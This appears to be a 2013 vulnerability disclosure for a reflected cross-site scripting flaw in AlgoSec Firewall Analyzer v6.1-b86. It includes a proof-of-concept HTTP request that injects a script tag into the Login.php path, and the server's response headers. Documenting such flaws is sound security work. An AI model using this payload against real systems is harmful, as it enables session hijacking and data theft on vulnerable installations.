AlgoSec Firewall Analyzer 6.1-b86 Cross Site Scripting

` AlgoSec Firewall Analyzer Version v6.1-b86 cross-site scripting (XSS)  
Vulnerability  
  
================================================================================================================================================================  
  
AlgoSec Firewall Analyzer Version v6.1-b86 cross-site  
scripting (XSS) Vulnerability  
================================================================================================================================================================  
  
  
#Date- 7/8/2013  
  
# code by Asheesh kumar Mani Tripathi  
  
  
  
# Credit by Asheesh Anaconda  
  
  
  
#Vulnerbility  
AlgoSec Firewall Analyzer is prone to an cross-site scripting (XSS)  
Vulnerability because the application fails to properly  
sanitize user-supplied input  
  
#Impact  
A successful exploit could allow an attacker to compromise the application,  
access or modify data, or exploit vulnerabilities  
  
  
========================================================================================================================  
  
Request  
========================================================================================================================  
  
GET /afa/php/Login.php/>'><ScRiPt>alert(11111111)</ScRiPt> HTTP/1.1  
Host: 172.28.154.163  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101  
Firefox/18.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: PHPSESSID=3ihq73ut5ivc5spnnbm65vuiu1  
  
  
========================================================================================================================  
  
Response  
========================================================================================================================  
  
HTTP/1.1 200 OK  
Date: Wed, 7 Aug 2013 15:59:23 GMT  
Server: Apache/2.2.3 (CentOS)  
X-Powered-By: PHP/5.1.6  
`